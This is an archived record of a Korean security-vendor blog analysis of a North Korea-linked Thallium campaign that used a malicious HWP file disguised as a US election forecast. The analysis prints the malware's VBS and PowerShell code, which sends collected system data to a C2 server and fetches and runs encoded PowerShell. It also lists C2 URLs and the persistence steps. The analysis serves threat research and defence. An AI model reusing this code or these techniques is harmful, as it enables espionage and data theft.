{
	"id": "f169dcdb-ed20-4805-9b06-b45c868e1004",
	"created_at": "2026-04-06T00:09:25.97791Z",
	"updated_at": "2026-04-10T13:12:27.828809Z",
	"deleted_at": null,
	"sha1_hash": "0182c2057b3d11c9c373511602ae2764d1bc1396",
	"title": "북한 연계 해킹조직 탈륨, 미국 대선 예측 언론 문서로 위장한 APT 공격 수행",
	"llm_title": "",
	"authors": "",
	"file_creation_date": "0001-01-01T00:00:00Z",
	"file_modification_date": "0001-01-01T00:00:00Z",
	"file_size": 176229,
	"plain_text": "북한 연계 해킹조직 탈륨, 미국 대선 예측 언론 문서로 위장한 APT\r\n공격 수행\r\nBy 알약(Alyac)\r\nPublished: 2020-11-03 · Archived: 2026-04-05 13:17:58 UTC\r\n안녕하세요? 이스트시큐리티 ESRC(시큐리티대응센터) 입니다.\r\n2020년 11월 03일 마치 미국 대선 예측과 관련된 언론사 문건처럼 위장한 악성 HWP 문서 파일이 바이러스\r\n토탈 서비스에 등록된 것이 확인 됐습니다.\r\nhttps://blog.alyac.co.kr/3352\r\nPage 1 of 13\n\n[그림 1] 바이러스 토탈 구글 서비스에 등록된 악성 파일 화면\r\n해당 악성 파일은 얼마 남지 않은 미국 대선 예측이라는 테마를 시기적절하게 사용했으며, 다음과 같은 형\r\n식을 가지고 있습니다.\r\n 파일 이름  파일 크기\r\n 마지막 저장 계\r\n정\r\n 마지막 수정 날짜\r\n 미국 대선 예측 - 미주중앙일\r\n보.hwp\r\n 36,352 바이\r\n트\r\n Admin\r\n 2020-11-01 11:23:35\r\n(KST)\r\n그동안 악성 HWP 문서는 주로 포스트 스크립트(Post Script) 취약점과 셸코드(Shellcode)를 결합한 공격이\r\n상대적으로 높았습니다.\r\n그러나 관련 취약점의 문제가 해소된 한컴 오피스 최신 제품의 보급이 커지자, 한국대상 위협 행위자들\r\n이 객체 연결 삽입(Object Linking and Embedding, OLE) 기능을 교묘히 악용하고 있습니다.\r\nhttps://blog.alyac.co.kr/3352\r\nPage 2 of 13\n\n참고로 OLE 기능은 마이크로 소프트사가 개발한 기술로서 문서와 기타 객체에 연결과 삽입을 도와주는\r\n연결규약으로 정의되고, 문서 파일에서 활용도가 많은 편인데, 한컴 오피스 제품에서는 '객체' 대신 '개\r\n체'라는 표현을 사용 합니다.\r\n- https://help.hancom.com/hoffice/webhelp/9.0/ko_kr/hwp/insert/objectinsert.htm\r\n이번에 발견된 악성 HWP 파일은 다음과 같이 악성 'BIN0001.OLE' 데이터가 삽입되어 있습니다.\r\n[그림 2] 악성 HWP 문서 내부 구조 화면\r\nOLE 내부를 살펴 보면, 악성코드 제작자가 VBS(비주얼 베이직 스크립트) 명령을 삽입한 내용과 제작 폴\r\n더 경로를 확인할 수 있습니다.\r\n제작자가 사용한 폴더 경로는 다음과 같고 바이러스 제작(Build Virus), 제작 시점 11월 01일(1101), VBS 이\r\n름 등의 의미가 담긴 것을 볼 수 있습니다. 물론, 변종에 따라 해당 경로는 조금씩 다르게 표시 됩니다.\r\nF:\\Sheet\\_Build_Virus\\1101\\Hancom.Configuration.VBS\r\n그리고 VBS 코드에는 한국의 특정 병의원 사이트(xeoskin.co[.]kr) 주소가 명령제어(C2) 서버로 지정된 것\r\n을 알 수 있습니다. 해당 웹 사이트는 해커의 지령 서버로 노출된 상태 입니다.\r\nhttps://blog.alyac.co.kr/3352\r\nPage 3 of 13\n\n[그림 3] OLE 내부에 포함된 악성 VBS 코드와 제작자 흔적\r\n내부 화면으로 보아 악성 VBS 코드가 작동되면 C2 서버의 PHP 인자값을 받고, 준비된 추가 명령을 수행하\r\n게 됩니다.\r\n이제 실제 악성 HWP 문서가 실행된 후, 어떤 절차를 통해 OLE 데이터와 VBS 코드가 연결되는지 살펴보\r\n고자 합니다.\r\n해당 본문의 첫 페이지는 영어로 'Outlook and Tasks for U.S. North Korea Policy Post-Election' 제목을 담고\r\n있는데, 실제 이 내용은 미국 정성장 윌슨센터 연구위원(세종연구소 수석연구위원)이 전망한 내용으로 확\r\n인 됩니다.\r\n- https://www.wilsoncenter.org/blog-post/outlook-and-tasks-us-north-korea-policy-post-election\r\n그리고 6페이지 부터는 한글로 작성된 내용이 포함되어 있습니다.\r\nhttps://blog.alyac.co.kr/3352\r\nPage 4 of 13\n\n[그림 4] 악성 HWP 문서가 실행된 후 보여지는 본문\r\n해당 문서에는 OLE 데이터가 눈에 띄지 않도록 교묘하게 숨겨져 있지만, 설정 변경을 통해 확인이 가능합\r\n니다.\r\n더불어 삽입된 위치에 접근시 자동으로 생성되고 클릭할 경우 악성 VBS 명령이 수행되지만, 한컴 오피스\r\n제품에서 버전 및 설정에 따라 보안 경고 메시지를 띄어 줍니다.\r\n따라서 보안 경고 메시지가 보여질 경우 절대 [열기]나 [한 번 허용] 등을 하지 않도록 주의하고, 반드시 [취\r\n소]를 선택하는 것이 안전 합니다.\r\nhttps://blog.alyac.co.kr/3352\r\nPage 5 of 13\n\n[그림 5] 악성 VBS 보안 경고 화면\r\nVBS 코드가 실행되면 내부 명령에 따라 다음과 같은 기능이 단계적으로 작동합니다. 다만, 위협 행위자는\r\n분석환경 및 접속자 등을 아이피(IP)로 기록해 중복 접근자에게 내부 명령이 쉽게 노출되지 않도록 나름\r\n치밀한 서버접근 규칙을 적용합니다.\r\nhttps://blog.alyac.co.kr/3352\r\nPage 6 of 13\n\n이러한 방식은 기존 탈륨(=김수키) 조직의 '스모크 스크린(Smoke Screen)' 위협 캠페인과 동일한 전술, 기\r\n법, 절차(Tactics, Techniques and Procedures, TTPs)를 가집니다.\r\n더불어 기존에 여러번 공개된 바 있는 'pre.hta', 'suf.hta', 'cross.php?op=인자값' 등의 구성이 모두 동일한데,\r\n이번에는 'pre.hta'가 생략 되었지만 실제 C2 서버에 존재하는 것은 확인 되었습니다.\r\n - http://xeoskin.co[.]kr/wp/wp-includes/SimplePie/Net/pre.hta (생략) -\u003e 실제 서버에 존재\r\n a. Hancom.Configuration.VBS\r\n b. http://xeoskin.co[.]kr/wp/wp-includes/SimplePie/Net/cross.php?op=1\r\n c. http://xeoskin.co[.]kr/wp/wp-includes/SimplePie/Net/suf.hta\r\n d. http://xeoskin.co[.]kr/wp/wp-includes/SimplePie/Net/cross.php?op=3\r\n e. http://xeoskin.co[.]kr/wp/wp-includes/SimplePie/Net/cross.php?op=2 -\u003e (Base64 Powershell Keylogger) \r\n'cross.php?op=1' 단계에서는 MS 오피스 VBA 레지스트리 보안 설정 변경과 수집된 로그정보 전달규칙 등\r\n을 선언 합니다.\r\n이때 사용하는 폼 데이터 바운더리 문자열 (multipart/form-data; boundary=----1f341c23b5204)은 기존 탈륨\r\n조직이 여러차례 사용한 바 있습니다.\r\nSub Report(tar)\r\nbnd = \"----1f341c23b5204\"\r\ndisp = \"--\" + bnd + vbCrLf + \"Content-Disposition: form-data; name=\"\r\nsz = \"MAX_FILE_SIZE\"\r\npd = disp + \"\"\"\" + sz + \"\"\"\" + vbCrLf + vbCrLf\r\npd = pd + \"1000000\" + vbCrLf \r\nf = \"file\"\r\nfn = \"1.txt\"\r\npd = pd + disp + \"\"\"\" + f + \"\"\"\"\r\npd = pd + \"; filename=\"\r\nset fp = obt(1).opentextfile(tar, 1, false, -2)\r\nreadData = fp.readall\r\nfp.close\r\nRoller(\"cmd /c del \" \u0026 tar)\r\nhttps://blog.alyac.co.kr/3352\r\nPage 7 of 13\n\npd = pd + \"\"\"\" + fn + \"\"\"\" + vbCrLf\r\npd = pd + \"Content-Type: text/plain\" + vbCrLf + vbCrLf\r\npd = pd + readData + vbCrLf + \"--\" + bnd + \"--\"\r\nwith obt(2)\r\n.open \"POST\", mas \u0026 \"report.php\", False\r\n.setRequestHeader \"Content-Type\", \"multipart/form-data; boundary=----1f341c23b5204\"\r\n.send pd\r\nend with\r\nSet obt(2) = Nothing\r\nEnd Sub \r\n그리고 GetInfo 서브함수를 통해 윈도우 운영체제의 각종 시스템 정보와 프로세스 목록, 설치된 프로그램\r\n리스트를 'sr011.xml' 파일로 만들고,  certutil.exe 프로그램의 Base64 인코딩 기능을 통해 'sr011.xml' 파일을\r\n'conv.xml' 파일로 변환 합니다.\r\n[그림 6] C2 서버에 숨겨져 있던 'pre.hta' 화면\r\nhttps://blog.alyac.co.kr/3352\r\nPage 8 of 13\n\n[그림 7] 실제 공격 명령에 사용된 'suf.hta' 화면  \r\n'conv.xml' 파일 변환 과정 후에 작업스케줄러 생성 명령을 통해 매 1시간 마다 C2 서버의 'suf.hta' 주소로 접\r\n속해 실행되도록 설정 합니다.\r\n이때 사용된 이름은 마치 한국의 보안회사 프로그램 업데이트(AhnlabUpdate)처럼 위장하였습니다.\r\nhttps://blog.alyac.co.kr/3352\r\nPage 9 of 13\n\n[그림 8] 작업 스케줄러에 등록된 악성 명령 화면\r\n'suf.hta' 명령이 실행되면, 'cross.php?op=3' 단계로 이어지고 파워셸 롤러(PowRol) 서브 함수를 통해\r\n'cross.php?op=2' 주소로 다시 연결 됩니다.\r\n물론, 이외에도 정보 수집 기능은 계속 포함되어 있습니다.\r\nSub Roller(param)\r\nws.run param, 0, true\r\nEnd Sub\r\nSub PowRol()\r\ndim content\r\nox.open \"GET\", uri \u0026 \"cross.php?op=2\", False\r\nox.Send\r\ncontent = ox.responseText\r\nRoller(\"powershell.exe -noprofile -sta -encodedcommand \" \u0026 content)\r\nhttps://blog.alyac.co.kr/3352\r\nPage 10 of 13\n\nEnd Sub\r\nSub Report(parmPath)\r\nset fp = oFile.opentextfile(parmPath, 1, false, -2)\r\nreadData = fp.readall\r\nfp.close\r\nboundary = \"----1f341c23b5204\"\r\npostData = \"--\" + boundary + vbCrLf + \"Content-Disposition: form-data; name=\"\"MAX_FILE_SIZE\"\"\" +\r\nvbCrLf+ vbCrLf + \"1000000\" + vbCrLf + \"--\" + boundary + vbCrLf + \"Content-Disposition: form-data;\r\nname=\"\"file\"\"; filename=\"\"1.txt\"\"\" + vbCrLf + \"Content-Type: text/plain\" + vbCrLf + vbCrLf + readData +\r\nvbCrLf + \"--\" + boundary + \"--\"\r\nwith ox\r\n.open \"POST\", uri \u0026 \"report.php\", False\r\n.setRequestHeader \"Content-Type\", \"multipart/form-data; boundary=----1f341c23b5204\"\r\n.send postData\r\nend with\r\nRoller(\"cmd /c del \"\u0026dst\u0026\";del \"\u0026src)\r\nEnd Sub\r\ndim uri, dir, src, dst\r\nuri = \"http://xeoskin.co[.]kr/wp/wp-includes/SimplePie/Net/\"\r\ndir = ws.ExpandEnvironmentStrings(\"%appdata%\") \u0026 \"\\Microsoft\\Network\"\r\nIf oFile.FolderExists(dir) = false Then\r\noFile.CreateFolder(dir)\r\nEnd If\r\nsrc= dir \u0026 \"\\sr011.xml\"\r\ndst= dir \u0026 \"\\conv.xml\"\r\nIf oFile.FileExists (src) Then\r\nRoller(\"certutil -f -encode \" \u0026 src \u0026 \" \" \u0026 dst)\r\nhttps://blog.alyac.co.kr/3352\r\nPage 11 of 13\n\nReport(dst)\r\nEnd If\r\nPowRol\r\n'cross.php?op=2' 단계에서는 Base64 문자로 인코딩된 파워셸 명령어가 호출되는데, 디코딩 후에는\r\n'Global\\AlreadyRunning191122' 뮤텍스 코드가 존재합니다.\r\n이때 사용된 뮤텍스 이름은 기존에 여러차례 보고된 탈륨 조직의 문자열과 정확히 일치 합니다.\r\n$bTrue=1;\r\n$mutexName=\"Global\\AlreadyRunning191122\";\r\n$Path=\"$env:appdata\\Microsoft\\Network\\sr011.xml\"\r\ntry{\r\n$mutexOpen=[System.Threading.Mutex]::OpenExisting($mutexName);\r\n#echo\"MutexAlreadyExist!!!\";\r\n$bTrue=0;\r\n}\r\ncatch{\r\n#echo\"MutexNotExist!!!\";\r\n$mutexNew=New-ObjectSystem.Threading.Mutex([bool]1,$mutexName);\r\n탈륨 조직은 미국 마이크로 소프트사가 북한과 연계된 해킹조직으로 정식 고소해 현재 궐석 재판이 진행\r\n중인 가운데, 대한민국을 상대로 한 다양한 APT(지능형지속위협) 공격도 감행 중입니다.\r\n특히 HWP, DOC 등의 문서 파일 기반의 공격 뿐만 아니라,  WSF 와 EXE 실행파일을 이용한 공격까지 포\r\n함하면 말 그대로 파상공세를 이어가고 있습니다.\r\n이들의 사이버 첩보 활동을 오랜 기간 추적 관찰한 결과, 전략 전술이 꾸준히 발전하고 고도화되고 있어\r\n더 많은 연구와 방어 노력이 필요한 시점입니다.\r\n다가오는 미국 대통령 선거 등 국제적으로 관심이 높은 키워드나 호기심을 유발할 수 있는 내용이 해킹 공\r\n격에 좋은 먹잇감이 될 수 있다는 것을 항상 명심하고, 유사한 보안 위협에 현혹되거나 쉽게 노출되지 않\r\n도록 더 많은 관심과 보안실천 노력이 필요 하겠습니다.\r\n저희 ESRC에서는 앞으로도 탈륨과 같은 정부차원의 해킹조직에 대한 보다 체계적이고 전문화된 연구를\r\n지속할 것 입니다. 아울러 신속한 분석과 대응 역량을 높이기 위해 더욱 더 연구에 매진할 것입니다. 감사\r\n합니다.\r\nhttps://blog.alyac.co.kr/3352\r\nPage 12 of 13\n\nSource: https://blog.alyac.co.kr/3352\r\nhttps://blog.alyac.co.kr/3352\r\nPage 13 of 13",
	"extraction_quality": 1,
	"language": "KO",
	"sources": [
		"Malpedia"
	],
	"origins": [
		"web"
	],
	"references": [
		"https://blog.alyac.co.kr/3352"
	],
	"report_names": [
		"3352"
	],
	"threat_actors": [],
	"ts_created_at": 1775434165,
	"ts_updated_at": 1775826747,
	"ts_creation_date": 0,
	"ts_modification_date": 0,
	"files": {
		"pdf": "https://archive.orkl.eu/0182c2057b3d11c9c373511602ae2764d1bc1396.pdf",
		"text": "https://archive.orkl.eu/0182c2057b3d11c9c373511602ae2764d1bc1396.txt",
		"img": "https://archive.orkl.eu/0182c2057b3d11c9c373511602ae2764d1bc1396.jpg"
	}
}